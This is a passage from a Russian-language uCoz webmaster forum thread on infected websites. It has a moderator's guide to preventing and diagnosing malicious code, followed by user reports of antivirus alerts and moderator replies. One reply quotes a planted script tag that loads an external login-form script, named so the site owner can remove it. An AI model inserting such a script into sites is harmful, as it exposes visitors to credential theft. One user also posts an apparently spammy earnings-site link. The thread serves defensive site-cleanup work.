|
Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
LITEL
Сообщений: 226
Сообщение # 991 |
23:39:26
22 Янв 2014
Цитата Miss_Esq (  ) LITEL, Реклама появляется в Firefox ? В Opera ? В IE ? или только с Хромом ?
в коде реклами я много видел силок юкоз !!!!!!
|
Miss_Esq
Сообщений: 13859
Уровень замечаний:
Сообщение # 992 |
23:45:59
22 Янв 2014
LITEL, Цитата в коде реклами я много видел силок юкоз
Удалите хром, зачистить реестр компьютера, зачистить временные файлы интернета, проверить компьютер антивирусом ... Хром у вас заражён ...
|
Yuri_G
uWeb support
uVip manager
Сообщений: 4337
Сообщение # 993 |
23:50:34
22 Янв 2014
|
Админ3320
Сообщений: 4
Сообщение # 994 |
10:23:47
23 Янв 2014
Доброго времени суток. У меня вирус на сайтах http://rabotaizrael.do.am/ http://rabotatut.do.am/ http://rabotatut.moy.su/ что делать? Спасибо.Добавлено (23 Янв 2014, 10:23:47)
---------------------------------------------
Доброго времени суток. У меня вирус на сайтах http://rabotaizrael.do.am/ http://rabotatut.do.am/ http://rabotatut.moy.su/ что делать? Когда пытаюсь зайти через любой браузер всплывает окно антивируса AVG "Угроза заблокирована" Имя файла: "адрес сайта" Имя угрозы: "Найден вирус JS/Rebir"
|
Gosha2302
Сообщений: 1
Сообщение # 995 |
12:35:53
23 Янв 2014
день добрый. антивирус AVG ругается при заходе на два мои сайта - persian.ucox.lv и exotic.ucoz.lv и сообщает о блокировке угрозы в виде вируса JS/Rebir.
интересно, но пока писал это сообщение, проблема исчезла - зашел на сайт для того, чтобы сделать скриншот сообщения антивируса, но ничего такого не выскочило....
|
сondor
Сообщений: 4661
Сообщение # 996 |
16:06:57
23 Янв 2014
Админ3320, Gosha2302, на ваших сайтах не было обнаружено никаких вредоносных скриптов. Они чистые. AVG ругается ошибочно на рекламу uCoz для неавторизованных пользователей. Пишите в службу поддержки AVG чтобы они исправляли этот момент.
Сообщение отредактировал сondor - Четверг, 23 Янв 2014, 16:17:17
|
stalker78yd
Сообщений: 2
Сообщение # 997 |
09:34:28
24 Янв 2014
наш сайт заблокировали, пишет, что сайт содержит iframe, при проверке на http://2ip.ru/site-virus-scaner/ утром писало (На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.) , но на сайт можно было зайти с с любого браузера, кроме ГУГЛ ХРОМ, сейчас сайт закрыт полностью и зайти на него можно только через админку. возможно, кто то в чате выложил заражонную ссылку. последние выложенные материалы я удалил,но это не помогло.
ЧТО НАМ ДЕЛАТЬ ? ПОМОГИТЕ ПОЖАЛУЙСТА.Добавлено (24 Янв 2014, 09:34:28)
---------------------------------------------
я уже удалил, все материалы, которые содержат ссылки на сторонние сайты и программы, добавленные за последние месяцы. я , так же пытаюсь запросить анализ нашего сайта с помощью Инструментов Google для веб-мастеров, но не могу понять куда мне на сайт http://rus-legion-bf3.ucoz.ru/ Загрузить этот файл подтверждения HTML. [googlee510f80db8da0534.html]
подскажите пожалуйста, мы теряем наших поклонников и , что более важно, наш авторитет и репутацию.
|
$Vladimir$
Сообщений: 7465
Сообщение # 998 |
11:04:34
24 Янв 2014
stalker78yd, загрузите в корень сайта, используя файловый менеджер.
|
webanet
Сообщений: 24067
Сообщение # 999 |
19:39:23
24 Янв 2014
stalker78yd, 2.ip.ru не предназначен для сканирования на вирусы и не является серьезным инструментом исследования сайта
а вредоносный код у вас на сайте есть
из блока наши КВ удалить скрипт
Код <script language="javascript" src="http://for-about.3dn.ru/cw/jogin_form_javascript.js"></script>
|
legioner4246
Сообщений: 7
Сообщение # 1000 |
16:58:05
01 Фев 2014
здравствуйте, при заходе через "старую форму входа на сайт" у меня постоянно добавляется в конце адресной строки непонятные буквы "?lXZGkv", что ,например, http://moj_sait.ru/url_ssilka1?lXZGkv, что это может быть, возможно это троян или какая-нибудь разновидность вируса?
Сообщение от legioner4246
|
webanet
Сообщений: 24067
Сообщение # 1001 |
18:13:21
01 Фев 2014
legioner4246, так и должно быть. это не вирус
|
radiant_soul
Сообщений: 1
Сообщение # 1002 |
17:38:58
02 Фев 2014
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте Вы должны предоставить ссылку на сайт! Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)2) проблема обнаруживается только под логином или под гостем тоже3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки Сообщение отредактировал webanet - Воскресенье, 02 Фев 2014, 17:45:01
Сообщение от radiant_soul
|
akka2100
Сообщений: 10
Сообщение # 1003 |
06:56:05
04 Фев 2014
У меня 90 % сайтов на юкоз заразились попандером помогите. Попандер очень умный с одного айпи один два открывания. В шаблонах скрип спрятан так что не найти но при просмотре кода сайта (ctrl +U) его видно внизу и вверху. Код большой и это массовое заражения юкоз. У меня сложные пароли и логин взломать не реально. Заражение только через сам конструктор юкоз
есть сайт заработай vce-partnerki.blogspot.com
|
Miss_Esq
Сообщений: 13859
Уровень замечаний:
Сообщение # 1004 |
07:35:01
04 Фев 2014
akka2100, Гадать будем на костях мамонта или на испражнениях крокодила на каких сайта возникла проблема ???
|
akka2100
Сообщений: 10
Сообщение # 1005 |
11:39:32
04 Фев 2014
есть сайт заработай vce-partnerki.blogspot.com
|
Чат сообщества
)
